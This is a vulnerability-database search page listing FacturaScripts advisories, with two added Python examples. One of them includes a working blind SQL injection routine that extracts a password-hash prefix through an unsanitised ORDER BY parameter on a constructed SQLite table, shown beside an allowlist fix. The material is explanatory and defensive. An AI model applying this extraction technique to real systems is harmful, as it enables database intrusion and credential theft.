
204 matches found

Positive Technologies
added 2026/05/07 12:00 a.m. · 7 views

PT-2026-38616

Name of the Vulnerable Software and Affected Versions: FacturaScripts versions prior to v2026
Description: An unauthenticated information disclosure issue in the Installer controller allows a remote attacker to trigger the phpinfo function on a fresh deployment. By requesting the endpoint "/" with...

CVSS 5.3 · AI score 5.8 · EPSS 0.00049
Exploits 0 · References 5
NVD
added 2026/05/05 8:16 p.m. · 5 views

CVE-2026-32699

FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...

CVSS 5.3 · EPSS 0.00018
Exploits 0 · References 1
Cvelist
added 2026/05/05 7:00 p.m. · 36 views

CVE-2026-32699 FacturaScripts unauthorized modification of immutable nick field via EditUser controller

FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...

CVSS 5.3 · EPSS 0.00018
Exploits 0 · References 1
CVE
added 2026/05/05 7:00 p.m. · 6 views

CVE-2026-32699

FacturaScripts (versions ≤ 2025.92) exposes a vulnerability in the EditUser endpoint where the nick field is not validated on POST, allowing an attacker to modify an immutable nickname by intercepting and altering form-data. The UI prevents editing this field, but a modified request can rename an...

CVSS 5.3 · AI score 5.8 · EPSS 0.00018
Exploits 0 · References 1
EUVD
added 2026/05/05 7:00 p.m. · 3 views

EUVD-2026-27438

FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...

CVSS 5.3 · AI score 5.8 · EPSS 0.00018
Exploits 0 · References 1
Vulnrichment
added 2026/05/05 7:00 p.m. · 3 views

CVE-2026-32699 FacturaScripts unauthorized modification of immutable nick field via EditUser controller

FacturaScripts is an open source accounting and invoicing software. In versions 2025.92 and earlier, the application fails to validate the nick parameter during a POST request to the EditUser controller. Although the user interface prevents editing this field, a user can bypass this restriction b...

CVSS 5.3 · AI score 5.8 · EPSS 0.00018
Exploits 0 · References 1
Snyk
added 2026/04/28 10:39 p.m. · 1 view

Access Control Bypass

Overview Affected versions of this package are vulnerable to Access Control Bypass through improper validation of the nick parameter in the user update process. An attacker can modify immutable account identifiers by intercepting and altering POST requests, potentially sabotaging audit trails,...

CVSS 5.3 · AI score 5.8 · EPSS 0.00018
Exploits 0 · References 2
Positive Technologies
added 2026/04/28 12:00 a.m. · 2 views

PT-2026-35875

Name of the Vulnerable Software and Affected Versions: FacturaScripts, affected versions not specified
Description: Broken Access Control exists in the user update logic. The application fails to validate the nick parameter during a 'POST' request to the '/EditUser' endpoint. Although the user...

CVSS 5.3 · AI score 5.8 · EPSS 0.00018
Exploits 0 · References 6
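The entries above for CVE-2026-32699 all describe the same flaw: the edit form hides the nick field, but the server copies whatever the POST body carries into the user record. The following is an added example, not FacturaScripts code and not taken from any of the listed advisories, showing the merge-everything pattern next to a handler that enforces the immutable field on the server and records the tamper attempt. The field names, record layout and audit-entry shape are assumptions; the stored record and the tampered form body are constructed test data.

```python
"""Added example (not FacturaScripts code): enforcing an immutable form field on
the server. Field names, record layout and audit-entry shape are assumptions."""

EDITABLE = {"email", "level", "langcode"}  # fields the edit form may change (assumed)
IMMUTABLE = {"nick"}                        # account identifier; fixed after creation


class ForbiddenFieldError(ValueError):
    """Raised when a request tries to change a field it is not allowed to."""


def update_user_unsafe(record, form):
    """Vulnerable pattern: every posted field is merged into the stored record.
    Re-enabling the disabled nick input in an intercepting proxy is enough to
    rename the account, because nothing here checks which fields arrived."""
    updated = dict(record)
    updated.update(form)
    return updated


def update_user_safe(record, form, audit):
    """Hardened pattern: only allowlisted fields are applied. A posted immutable
    field that differs from the stored value is refused and written to the
    audit list, so the tamper attempt itself stays visible in the trail."""
    for name in IMMUTABLE & set(form):
        if form[name] != record[name]:
            audit.append({"event": "immutable_field_tamper", "field": name,
                          "account": record["nick"], "attempted": form[name]})
            raise ForbiddenFieldError(f"{name} cannot be changed")
    unexpected = set(form) - EDITABLE - IMMUTABLE
    if unexpected:
        raise ForbiddenFieldError(f"unexpected fields: {sorted(unexpected)}")
    updated = dict(record)
    changed = []
    for name in sorted(EDITABLE & set(form)):
        if form[name] != record[name]:
            updated[name] = form[name]
            changed.append(name)
    audit.append({"event": "user_update", "account": record["nick"], "changed": changed})
    return updated


def tamper_is_blocked(record, form):
    """True if the hardened handler refuses the form instead of applying it."""
    try:
        update_user_safe(record, form, [])
    except ForbiddenFieldError:
        return True
    return False


# Constructed test data: the stored record and a POST body in which the
# read-only nick field was altered before submission.
STORED = {"nick": "bob", "email": "bob@example.test", "level": 1, "langcode": "en"}
TAMPERED = {"nick": "admin", "email": "bob@example.test", "level": 1, "langcode": "en"}

if __name__ == "__main__":
    print(update_user_unsafe(STORED, TAMPERED)["nick"])   # "admin": the bypass
    print(tamper_is_blocked(STORED, TAMPERED))            # True: refused server-side
```

A posted nick equal to the stored value is accepted, since a readonly input is still submitted by the browser; only a differing value is treated as tampering. The allowlist also rejects fields the form never exposes, which closes the same class of bug for any other column the model happens to have.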
EUVD
added 2026/04/14 6:30 p.m. · 5 views

EUVD-2026-22282

FacturaScripts has Stored Cross-Site Scripting XSS in "Observations" field via History View...

CVSS 9 · AI score 5.8 · EPSS 0.0003
Exploits 1 · References 3
Packet Storm
added 2026/04/13 12:00 a.m. · 70 views

📄 FacturaScripts SQL Injection

FacturaScripts versions prior to 2025.81 suffer from a remote SQL injection vulnerability in the API ORDER BY clause.

CVE-2026-25513: FacturaScripts has SQL Injection in API ORDER BY Clause

Overview

| Field | Details |
|---|---|
| CVE ID | CVE-2026-25513 |
| Severity | HIGH |
| Advisory | View... |

CVSS 8.8 · AI score 6.2 · EPSS 0.00029
Exploits 3
Packet Storm
added 2026/04/13 12:00 a.m. · 68 views

📄 FacturaScripts SQL Injection

FacturaScripts versions prior to 2025.81 suffer from a remote SQL injection vulnerability in the Autocomplete Actions functionality.

CVE-2026-25514: FacturaScripts has SQL Injection in Autocomplete Actions

Overview

| Field | Details |
|---|---|
| CVE ID | CVE-2026-25514 |
| Severity | HIGH |
...

CVSS 8.8 · AI score 6.2 · EPSS 0.00029
Exploits 3
GithubExploit
added 2026/04/11 7:14 p.m. · 92 views

Exploit for SQL Injection in Facturascripts

CVE-2026-25514: FacturaScripts has SQL Injection in Autocomple...

CVSS 8.8 · AI score 6.2 · EPSS 0.00029
Exploits 3
NVD
added 2026/02/04 8:16 p.m. · 4 views

CVE-2026-25514

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including...

CVSS 8.8 · EPSS 0.00029
Exploits 3 · References 2
Cvelist
added 2026/02/04 7:59 p.m. · 28 views

CVE-2026-25513 FacturaScripts has SQL Injection vulnerability in API ORDER BY Clause

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...

CVSS 8.3 · EPSS 0.00029
Exploits 3 · References 2
EUVD
added 2026/02/04 7:59 p.m. · 3 views

EUVD-2026-5359

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...

CVSS 8.3 · AI score 6 · EPSS 0.00029
Exploits 3 · References 2
ATTACKERKB
added 2026/02/04 7:59 p.m. · 5 views

CVE-2026-25513

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...

CVSS 8.3 · AI score 6 · EPSS 0.00029
Exploits 3 · References 3 · Affected Software 1
Vulnrichment
added 2026/02/04 7:59 p.m. · 3 views

CVE-2026-25513 FacturaScripts has SQL Injection vulnerability in API ORDER BY Clause

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the REST API that allows authenticated API users to execute arbitrary SQL queries through the sort parameter. The...

CVSS 8.3 · AI score 6 · EPSS 0.00029
Exploits 3 · References 2
CVE
added 2026/02/04 7:59 p.m. · 14 views

CVE-2026-25513

CVE-2026-25513 – FacturaScripts SQL Injection in API ORDER BY. The issue exists in FacturaScripts prior to version 2025.81, where the REST API sorts results using user-supplied values in ModelClass::getOrderBy(), directly concatenating them into the ORDER BY clause. This allows authenticated API...

CVSS 8.8 · AI score 6 · EPSS 0.00029
Exploits 3 · References 2 · Affected Software 1
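The entry above explains the mechanism of CVE-2026-25513: a client-controlled sort value is concatenated straight into the ORDER BY clause. ORDER BY takes expressions, not just column names, so an attacker who cannot append a second statement can still ask yes/no questions by choosing which column the rows are sorted on. The following is an added example, not FacturaScripts code and not from any of the listed advisories, that reproduces the concatenation pattern against an in-memory SQLite table, extracts a password-hash prefix through it one character at a time, and shows the allowlisted replacement that accepts only a known column and a fixed direction keyword. The table, its rows, the placeholder hashes and all helper names are assumptions.

```python
"""Added example (not FacturaScripts code): a sort parameter concatenated into
ORDER BY, beside an allowlisted replacement. Table, rows and helper names are
assumptions; the rows are constructed test data with placeholder hashes."""
import re
import sqlite3
import string

NICKS_BY_NICK = ["admin", "bob", "carol"]   # row order when sorted by nick
SORTABLE = {"nick", "email"}                # the only columns a client may sort on


def make_db():
    """In-memory SQLite table standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (nick TEXT PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "root@example.test", "$2y$10$placeholderA"),
        ("bob",   "b@example.test",    "$2y$10$placeholderB"),
        ("carol", "c@example.test",    "$2y$10$placeholderC"),
    ])
    return conn


def list_nicks_unsafe(conn, sort):
    """Vulnerable pattern: the sort value lands in the ORDER BY clause verbatim."""
    return [r[0] for r in conn.execute("SELECT nick FROM users ORDER BY " + sort)]


def list_nicks_safe(conn, sort):
    """Hardened pattern: sort is 'column' or 'column:desc'. The column must be in
    SORTABLE and the direction is mapped to a fixed keyword, so no client bytes
    are ever spliced into the SQL text."""
    m = re.fullmatch(r"([a-z_]+)(?::(asc|desc))?", sort)
    if not m or m.group(1) not in SORTABLE:
        raise ValueError("sort field not allowed: %r" % sort)
    direction = "DESC" if m.group(2) == "desc" else "ASC"
    sql = f"SELECT nick FROM users ORDER BY {m.group(1)} {direction}"
    return [r[0] for r in conn.execute(sql)]


def infer_password_prefix(conn, nick, length):
    """Boolean-based extraction through the unsafe sort. A CASE expression sorts
    by nick when a guess about one hash character is right and by email when it
    is wrong; the resulting row order answers yes or no. Returns the recovered
    prefix, or None if some position matched no character in the alphabet."""
    alphabet = string.ascii_letters + string.digits + "$./"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            guess = (f"(SELECT substr(password, {pos}, 1) FROM users "
                     f"WHERE nick = '{nick}') = '{ch}'")
            payload = f"(CASE WHEN {guess} THEN nick ELSE email END)"
            if list_nicks_unsafe(conn, payload) == NICKS_BY_NICK:
                recovered += ch
                break
        else:
            return None
    return recovered


def safe_rejects(conn, sort):
    """True if the hardened function refuses the given sort value."""
    try:
        list_nicks_safe(conn, sort)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(infer_password_prefix(db, "admin", 6))                      # "$2y$10"
    print(safe_rejects(db, "(CASE WHEN 1=1 THEN nick ELSE email END)"))  # True
```

The oracle works because the constructed rows sort differently by nick than by email; in a real table the attacker picks two columns with distinguishable orderings. Note that a parameterised query does not help here, since ORDER BY cannot take a bound parameter as a column reference: the fix is the allowlist, not escaping.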
Vulnrichment
added 2026/02/04 7:59 p.m. · 3 views

CVE-2026-25514 FacturaScripts has SQL Injection vulnerability in Autocomplete Actions

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including...

CVSS 8.7 · AI score 5.6 · EPSS 0.00029
Exploits 3 · References 2
OSV
added 2026/02/04 7:59 p.m. · 2 views

CVE-2026-25514 FacturaScripts has SQL Injection vulnerability in Autocomplete Actions

FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.81, FacturaScripts contains a critical SQL injection vulnerability in the autocomplete functionality that allows authenticated attackers to extract sensitive data from the database including...

CVSS 8.7 · AI score 5.6 · EPSS 0.00029
Exploits 3 · References 4